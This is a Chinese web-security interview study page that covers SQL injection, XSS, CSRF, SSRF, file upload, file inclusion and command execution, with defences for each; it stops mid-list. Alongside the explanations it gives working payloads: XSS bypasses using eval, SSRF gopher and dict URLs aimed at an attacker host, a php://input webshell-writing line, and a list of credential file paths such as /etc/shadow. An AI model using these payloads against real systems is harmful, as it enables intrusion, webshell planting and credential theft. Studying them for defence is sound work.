
<h3 id="预编译是否100-能防御SQL注入"><a href="#预编译是否100-能防御SQL注入" class="headerlink" title="预编译是否100%能防御SQL注入"></a><font color="green">预编译是否100%能防御SQL注入</font></h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">预编译原理：</span><br><span class="line">先将查询语句固定</span><br><span class="line">通过函数将传参变为字符串</span><br><span class="line">拼接字符串去执行</span><br><span class="line">你的关键字根本不会当作关键字去执行</span><br><span class="line">$pdo<span class="operator">-</span><span class="operator">&gt;</span>query(‘<span class="keyword">SET</span> NAMES gbk’);</span><br><span class="line">$var <span class="operator">=</span> “\xbf\x27 <span class="keyword">OR</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="operator">/</span>“;</span><br><span class="line">$query <span class="operator">=</span> ‘<span class="keyword">SELECT</span> <span class="keyword">FROM</span> test <span class="keyword">WHERE</span> name <span class="operator">=</span> ? LIMIT <span class="number">1</span>’;</span><br><span class="line">$stmt <span class="operator">=</span> $pdo<span class="operator">-</span><span class="operator">&gt;</span><span class="keyword">prepare</span>($query);</span><br><span class="line">$stmt<span class="operator">-</span><span class="operator">&gt;</span><span class="keyword">execute</span>(<span class="keyword">array</span>($var)); 类似于宽字节注入</span><br></pre></td></tr></table></figure>

<h3 id="发现-demo-jsp-uid-110-注入点，你有哪几种思路获取-webshell"><a href="#发现-demo-jsp-uid-110-注入点，你有哪几种思路获取-webshell" class="headerlink" title="发现 demo.jsp?uid=110 注入点，你有哪几种思路获取 webshell"></a>发现 demo.jsp?uid=110 注入点，你有哪几种思路获取 webshell</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">(1)有写入权限的，构造联合查询语句使用 using INTO OUTFILE，可以将查询</span><br><span class="line">的输出重定向到系统的文件中，这样去写入 WebShell</span><br><span class="line">(2)使用 sqlmap –os-shell 原理和上面一种相同，来直接获得一个 Shell，这样</span><br><span class="line">效率更高</span><br><span class="line">(3)通过构造联合查询语句得到网站管理员的账户和密码，然后扫后台登录后台，</span><br><span class="line">再在后台通过改包上传等方法上传 Shell</span><br></pre></td></tr></table></figure>

<h2 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h2><h3 id="XSS的分类"><a href="#XSS的分类" class="headerlink" title="XSS的分类"></a>XSS的分类</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1.反射型</span><br><span class="line">	发出请求时，XSS代码出现在URL中，作为输入提交到服务器端，服务器端解析后响应，XSS代码随响应内容一起传回给浏览器，最后浏览器解析执行XSS代码。</span><br><span class="line">2.存储型</span><br><span class="line">	存储型XSS和反射型XSS的差别仅在于，提交的代码会存储在服务端（数据库，内存，文件系统等），下次请求目标页面时不用再提交XSS代码。（例如：常见的评论，在文本框中输入一段代码，那么就会存放在数据库当中，当再次加载的时候便会执行这样的代码）</span><br><span class="line"></span><br><span class="line">3.DOM型XSS</span><br></pre></td></tr></table></figure>

<h3 id="如何预防XSS"><a href="#如何预防XSS" class="headerlink" title="如何预防XSS"></a>如何预防XSS</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">过滤一些危险字符，以及转义&amp; &lt; &gt; &quot; &#x27; /等危险字符</span><br><span class="line">HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此Cookie。</span><br><span class="line">设置CSP(Content Security Policy)</span><br><span class="line">输入内容长度限制</span><br></pre></td></tr></table></figure>

<h3 id="XSS和CSRF、SSRF的区别"><a href="#XSS和CSRF、SSRF的区别" class="headerlink" title="XSS和CSRF、SSRF的区别"></a>XSS和CSRF、SSRF的区别</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">相同：三种Web服务端漏洞均是服务器对用户提供的可控数据过于信任或过滤不严导致的</span><br><span class="line">不同：</span><br><span class="line">	XSS是服务器对用户输入的数据没有进行足够的过滤，导致客户端浏览器在渲染服务器返回前端页面出现了预期之外的脚本语句执行</span><br><span class="line">	CSRF是服务器没对用户提交的数据进行随机值校验，且对http请求包内的refer字段校验不严，导致攻击者利用用户cookie信息伪造用户请求发送至服务器</span><br><span class="line">	SSRF是服务器对用户提交的可控URL过于信任，没有对攻击者提供的url进行地址限制和足够的检测，导致攻击者可以以此为跳板攻击内网或其他服务器</span><br></pre></td></tr></table></figure>

<h3 id="除了alert函数，还可以使用哪些函数弹窗"><a href="#除了alert函数，还可以使用哪些函数弹窗" class="headerlink" title="除了alert函数，还可以使用哪些函数弹窗"></a>除了alert函数，还可以使用哪些函数弹窗</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">prompt(),confirm()</span><br></pre></td></tr></table></figure>

<h3 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1.过滤空格：</span><br><span class="line">	用/代替空格</span><br><span class="line">2.关键字过滤：</span><br><span class="line">	双写绕过</span><br><span class="line">	大小写绕过</span><br><span class="line">	字符串拼接：<span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;x&quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;a=`aler`;b=`t`;c=&#x27;(`xss`);&#x27;;eval(a+b+c)&quot;</span>&gt;</span></span><br><span class="line">	编码绕过</span><br><span class="line">		Unicode编码绕过：<span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;x&quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;<span class="symbol">&amp;#97;</span><span class="symbol">&amp;#108;</span><span class="symbol">&amp;#101;</span><span class="symbol">&amp;#114;</span><span class="symbol">&amp;#116;</span><span class="symbol">&amp;#40;</span><span class="symbol">&amp;#34;</span><span class="symbol">&amp;#120;</span><span class="symbol">&amp;#115;</span><span class="symbol">&amp;#115;</span><span class="symbol">&amp;#34;</span><span class="symbol">&amp;#41;</span><span class="symbol">&amp;#59;</span>&quot;</span>&gt;</span></span><br><span class="line">		URL编码绕过：<span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;x&quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;eval(unescape(&#x27;%61%6c%65%72%74%28%22%78%73%73%22%29%3b&#x27;))&quot;</span>&gt;</span></span><br><span class="line">		ascii码绕过：<span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;x&quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))&quot;</span>&gt;</span></span><br><span class="line">		base64绕过：<span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;x&quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;eval(atob(&#x27;ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw==&#x27;))&quot;</span>&gt;</span></span><br><span class="line">3.过滤单双引号</span><br><span class="line">	编码绕过</span><br><span class="line">	使用反引号：<span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;x&quot;</span> <span class="attr">onerror</span>=<span class="string">alert(</span>`<span class="attr">xss</span>`);&gt;</span></span><br><span class="line">4.其他</span><br><span class="line">	使用中文标点</span><br><span class="line">	使用IP</span><br></pre></td></tr></table></figure>



<h2 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h2><h3 id="什么是CSRF"><a href="#什么是CSRF" class="headerlink" title="什么是CSRF"></a>什么是CSRF</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">攻击者盗用了你的身份信息，以你的名义发送恶意请求，对服务器来说这个请求是你发起的，却完成了攻击者所期望的一个操作</span><br></pre></td></tr></table></figure>

<h3 id="CSRF的预防"><a href="#CSRF的预防" class="headerlink" title="CSRF的预防"></a>CSRF的预防</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1.当用户发送重要的请求时输入验证码</span><br><span class="line">2.涉及随机TOKEN ---数据包的唯一值</span><br><span class="line">3.检测referer来源，请求时判断请求连接是否为当前管理员正在使用的页面（管理员在编辑文章，黑客发来恶意的修改密码链接，因为修改密码页面管理员并没有在操作，所以攻击失败）</span><br><span class="line">4.设置验证码</span><br><span class="line">5.限制请求方式只能为post0</span><br></pre></td></tr></table></figure>



<h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2><h3 id="SSRF形成的原因"><a href="#SSRF形成的原因" class="headerlink" title="SSRF形成的原因"></a>SSRF形成的原因</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。 </span><br></pre></td></tr></table></figure>

<h3 id="SSRF绕过"><a href="#SSRF绕过" class="headerlink" title="SSRF绕过"></a>SSRF绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1.使用Enclosed alphanumerics编码</span><br><span class="line">2.[::]绕过</span><br><span class="line">3.@example绕过 http://example.com@127.0.0.1</span><br><span class="line">4.127.0.0.1 =&gt; 127.1 =&gt; http://0/</span><br><span class="line">5.短域名绕过</span><br><span class="line">6..xip.io绕过</span><br><span class="line">7.IP进制转换</span><br><span class="line">8.利用句号 127。0。0。1 =&gt; 127.0.0.1</span><br><span class="line">9.利用协议</span><br><span class="line">	Dict://</span><br><span class="line">	dict://&lt;user-auth&gt;@&lt;host&gt;:&lt;port&gt;/d:&lt;word&gt;</span><br><span class="line">	ssrf.php?url=dict://attacker:11111/</span><br><span class="line">	</span><br><span class="line">  SFTP://</span><br><span class="line">  ssrf.php?url=sftp://example.com:11111/</span><br><span class="line">  </span><br><span class="line">  TFTP://</span><br><span class="line">  ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET</span><br><span class="line">  </span><br><span class="line">  LDAP://</span><br><span class="line">  ssrf.php?url=ldap://localhost:11211/%0astats%0aquit</span><br><span class="line">  </span><br><span class="line">  Gopher://</span><br><span class="line">  ssrf.php?	 url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a</span><br></pre></td></tr></table></figure>



<h3 id="SSRF的利用方式"><a href="#SSRF的利用方式" class="headerlink" title="SSRF的利用方式"></a>SSRF的利用方式</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1.让服务端去访问相应的网址</span><br><span class="line">2.让服务端去访问自己所处内网的一些指纹文件来判断是否存在相应的cms</span><br><span class="line">3.可以使用file、dict、gopher[11]、ftp协议进行请求访问相应的文件</span><br><span class="line">4.攻击内网web应用（可以向内部任意主机的任意端口发送精心构造的数据包&#123;payload&#125;）</span><br><span class="line">5.攻击内网应用程序（利用跨协议通信技术）</span><br><span class="line">6.判断内网主机是否存活：方法是访问看是否有端口开放</span><br><span class="line">7.DoS攻击（请求大文件，始终保持连接keep-alive always）</span><br></pre></td></tr></table></figure>



<h3 id="SSRF预防"><a href="#SSRF预防" class="headerlink" title="SSRF预防"></a>SSRF预防</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1.禁止跳转</span><br><span class="line">2.过滤返回信息，验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。</span><br><span class="line">3.禁用不需要的协议，仅仅允许http和https请求。可以防止类似于file://, gopher://, ftp:// 等引起的问题</span><br><span class="line">4.设置URL白名单或者限制内网IP（使用gethostbyname()判断是否为内网IP）</span><br><span class="line">5.限制请求的端口为http常用的端口，比如 80、443、8080、8090</span><br><span class="line">6.统一错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态。</span><br></pre></td></tr></table></figure>



<h2 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h2><h2 id="越权漏洞"><a href="#越权漏洞" class="headerlink" title="越权漏洞"></a>越权漏洞</h2><h3 id="水平越权和垂直越权"><a href="#水平越权和垂直越权" class="headerlink" title="水平越权和垂直越权"></a>水平越权和垂直越权</h3><figure class="highlight plaintext"><figcaption><span>l</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">水平越权：</span><br><span class="line">		水平越权通常是获得同级别用户的权限，可以访问到同级别用户的数据</span><br><span class="line"></span><br><span class="line">垂直越权：</span><br><span class="line">		垂直越权又叫权限攻击，是获得高于自己当权角色权限的账户的权限。</span><br></pre></td></tr></table></figure>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic2.zhimg.com/v2-5fefd7bec4b78cc29fd64643ed46cd50_1440w.jpg?source=172ae18b"
                      alt="越权漏洞原理及防御方案"
                ></p>
<h3 id="越权漏洞通常出现的位置"><a href="#越权漏洞通常出现的位置" class="headerlink" title="越权漏洞通常出现的位置"></a>越权漏洞通常出现的位置</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">订单界面</span><br><span class="line">修改用户信息界面</span><br><span class="line">用户信息查询界面</span><br><span class="line">等通过ID或者文件名等参数进行交互的地方</span><br></pre></td></tr></table></figure>



<h3 id="越权漏洞预防措施"><a href="#越权漏洞预防措施" class="headerlink" title="越权漏洞预防措施"></a>越权漏洞预防措施</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">前后端同时对用户输入信息进行校验，双重验证机制</span><br><span class="line">调用功能前验证用户是否有权限调用相关功能</span><br><span class="line">执行关键操作验证用户身份，验证是否有操作数据的权限</span><br><span class="line">直接对象引用的资源ID，防止攻击者枚举ID，敏感数据特殊化处理</span><br><span class="line">对可控参数进行严格的检查和过滤</span><br></pre></td></tr></table></figure>

<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><h3 id="常用绕过手法"><a href="#常用绕过手法" class="headerlink" title="常用绕过手法"></a>常用绕过手法</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">客户端</span><br><span class="line">	js检查</span><br><span class="line"></span><br><span class="line">服务端</span><br><span class="line">    检查后缀</span><br><span class="line">    黑名单</span><br><span class="line">    上传特殊可解析后缀</span><br><span class="line">    上传.htaccess</span><br><span class="line">    上传.user.ini</span><br><span class="line">    后缀大小写绕过</span><br><span class="line">    点绕过</span><br><span class="line">    空格绕过</span><br><span class="line">    ::$DATA</span><br><span class="line"></span><br><span class="line">配合解析漏洞</span><br><span class="line">    Apache HTTPD 换行解析漏洞（CVE-2017-15715）</span><br><span class="line">    Apache HTTPD 多后缀解析漏洞</span><br><span class="line">    Nginx 解析漏洞</span><br><span class="line">    IIS7.5解析漏洞</span><br><span class="line">    IIS6解析漏洞</span><br><span class="line">    双后缀名绕过</span><br><span class="line">    </span><br><span class="line">白名单</span><br><span class="line">    MIME绕过</span><br><span class="line">    %00截断</span><br><span class="line">    0x00截断（白名单、上传路径可控、php.ini中的magic_quotes_gpc为off）</span><br><span class="line">    0x0a截断（php版本&lt;5.3.4、php.ini中的magic_quotes_gpc设置为off、上传路径可控、白名单）</span><br><span class="line">    检查内容</span><br><span class="line">    文件头检查</span><br><span class="line">    突破getimagesize()</span><br><span class="line">    突破exif_imagetype()</span><br><span class="line">    二次渲染</span><br><span class="line">    其他</span><br><span class="line">    条件竞争</span><br></pre></td></tr></table></figure>

<h3 id="PHP爆绝对路径的方法"><a href="#PHP爆绝对路径的方法" class="headerlink" title="PHP爆绝对路径的方法"></a>PHP爆绝对路径的方法</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">单引号爆路径</span><br><span class="line">错误参数值爆路径</span><br><span class="line">Google 爆路径:Site:xxx.edu.tw warning</span><br><span class="line">测试文件爆路径（test.php、1.php、ceshi.php、info.php）</span><br><span class="line">phpmyadmin 爆路径:/phpmyadmin/libraries/lect_lang.lib.php</span><br><span class="line">配置文件找路径</span><br></pre></td></tr></table></figure>



<h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><h3 id="PHP中文件包含函数及其特点"><a href="#PHP中文件包含函数及其特点" class="headerlink" title="PHP中文件包含函数及其特点"></a>PHP中文件包含函数及其特点</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">require()</span><br><span class="line">require_once()</span><br><span class="line">include()</span><br><span class="line">include_once()</span><br><span class="line"></span><br><span class="line">include和require区别主要是，include在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行；而require函数出现错误的时候，会直接报错并退出程序的执行。</span><br><span class="line"></span><br><span class="line">而include_once()，require_once()这两个函数，与前两个的不同之处在于这两个函数只包含一次，适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下，你想确保它只被包括一次以避免函数重定义，变量重新赋值等问题</span><br></pre></td></tr></table></figure>

<h3 id="常见的敏感信息路径"><a href="#常见的敏感信息路径" class="headerlink" title="常见的敏感信息路径"></a>常见的敏感信息路径</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Windows系统</span><br><span class="line">c:\boot.ini // 查看系统版本</span><br><span class="line">c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件</span><br><span class="line">c:\windows\repair\sam // 存储Windows系统初次安装的密码</span><br><span class="line">c:\ProgramFiles\mysql\my.ini // MySQL配置</span><br><span class="line">c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码</span><br><span class="line">c:\windows\php.ini // php 配置信息</span><br><span class="line"></span><br><span class="line">Linux/Unix系统</span><br><span class="line">/etc/passwd // 账户信息</span><br><span class="line">/etc/shadow // 账户密码文件</span><br><span class="line">/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件</span><br><span class="line">/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置</span><br><span class="line">/usr/local/app/php5/lib/php.ini // PHP相关配置</span><br><span class="line">/etc/httpd/conf/httpd.conf // Apache配置文件</span><br><span class="line">/etc/my.conf // mysql 配置文件</span><br></pre></td></tr></table></figure>

<h3 id="session文件包含漏洞"><a href="#session文件包含漏洞" class="headerlink" title="session文件包含漏洞"></a>session文件包含漏洞</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">利用条件：</span><br><span class="line">1.session的存储位置可以获取</span><br><span class="line">  可以通过phpinfo查看</span><br><span class="line">  可以进行猜测路径，如linux下默认存储在/var/lib/php/session目录下</span><br><span class="line">2.session中的内容可以被控制，传入恶意代码</span><br></pre></td></tr></table></figure>

<h3 id="文件包含常用绕过"><a href="#文件包含常用绕过" class="headerlink" title="文件包含常用绕过"></a>文件包含常用绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">%00截断绕过</span><br><span class="line">	magic_quotes_gpc = Off php版本&lt;5.3.4</span><br><span class="line">路径长度截断</span><br><span class="line">	windows OS，点号需要长于256；linux OS 长于4096</span><br><span class="line">./绕过</span><br><span class="line">去后缀名绕过</span><br><span class="line">问号绕过</span><br><span class="line">#号绕过</span><br></pre></td></tr></table></figure>

<h3 id="PHP伪协议"><a href="#PHP伪协议" class="headerlink" title="PHP伪协议"></a>PHP伪协议</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>.php:<span class="comment">//filter（本地磁盘文件进行读取）</span></span><br><span class="line">	用法：?filename=php:<span class="comment">//filter/convert.base64-encode/resource=xxx.php</span></span><br><span class="line"><span class="number">2</span>.php:<span class="comment">//input （读取POST数据）</span></span><br><span class="line">	用法：POST写入木马<span class="meta">&lt;?PHP</span> fputs(fopen(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php @eval($_POST[cmd])?&gt;&#x27;</span>);<span class="meta">?&gt;</span></span><br><span class="line"><span class="number">3</span>.file:<span class="comment">//伪协议 （读取文件内容）</span></span><br><span class="line">	用法：file:<span class="comment">//c:/boot.ini</span></span><br><span class="line"><span class="number">4</span>.data:<span class="comment">//(读取文件)</span></span><br><span class="line">	用法：data:<span class="comment">//text/plain;base64,SSBsb3ZlIFBIUAo=</span></span><br><span class="line"><span class="number">5</span>.phar:<span class="comment">//（压缩文件读取）</span></span><br><span class="line">	用法：?file=phar:<span class="comment">//压缩包/内部文件</span></span><br></pre></td></tr></table></figure>



<h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><h3 id="常见危险函数"><a href="#常见危险函数" class="headerlink" title="常见危险函数"></a>常见危险函数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">代码执行函数：eval、assert、call_user_func、create_function、array_map</span><br><span class="line">命令执行函数：system、passthru、exec、pcntl_exec、shell_exec、popen()</span><br></pre></td></tr></table></figure>

<h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.尽量少用执行命令的函数或者直接禁用</span><br><span class="line">2.参数值尽量使用引号包括</span><br><span class="line">3.在使用动态函数之前，确保使用的函数是指定的函数之一</span><br><span class="line">4.在进入执行命令的函数/方法之前，对参数进行过滤，对敏感字符进行转义</span><br><span class="line">5.能使用脚本解决的工作，不要调用其他程序处理。尽量少用执行命令的函数，并在disable_functions中禁用</span><br><span class="line">6.对于可控点是程序参数的情况下，使用escapeshellcmd函数进行过滤，对于可控点是程序参数值的情况下，使用escapeshellarg函数进行过滤</span><br><span class="line">7.参数的值尽量使用引号包裹，并在拼接前调用addslashes进行转义</span><br><span class="line">而针对由特定第三方组件引发的漏洞，我们要做的就是及时打补丁，修改安装时的默认配置。</span><br></pre></td></tr></table></figure>

















<h2 id="常见web漏洞原理、防御办法"><a href="#常见web漏洞原理、防御办法" class="headerlink" title="常见web漏洞原理、防御办法"></a>常见web漏洞原理、防御办法</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">1.SQL注入</span><br><span class="line">	原理：数据与代码未分离</span><br><span class="line">	防御：</span><br><span class="line">	waf</span><br><span class="line">	使用预编译语句，绑定变量</span><br><span class="line">	检查数据类型，例如限制输入数据只能为int</span><br><span class="line">	使用安全函数,encodeForSQL()</span><br><span class="line">	最小权限原则，避免直接使用root</span><br><span class="line">2.XSS</span><br><span class="line">	原理：</span><br><span class="line">	防御：</span><br><span class="line">	在Cookie中设置HttpOnly标识,禁止页面的js访问带有httponly属性的cookie</span><br><span class="line">	XSS Filter：过滤用户输入的危险字符，设置黑白名单</span><br><span class="line">	输出检查：编码和转义，常用编码：html编码、url编码、js编码、16进制、base64等，使得浏览器无法解析执行js代码</span><br><span class="line">	针对不同位置的输出，使用不同的处理方式</span><br><span class="line">	处理富文本:限制用户能使用的标签，限制为只能使用a、div等安全的标签</span><br><span class="line">	header中使用content-Sencurity-Policy字段，规定请求js的域名白名单（CSP策略）</span><br><span class="line">3.CSRF</span><br><span class="line">	原理：通过伪装来自受信任用户的请求来利用受信任的网站,例如：用户登录某账户，浏览器获得cookie；攻击者诱使用户访问某构造好的恶意CSRF页面。</span><br><span class="line">	防御：</span><br><span class="line">	验证码</span><br><span class="line">	Referer 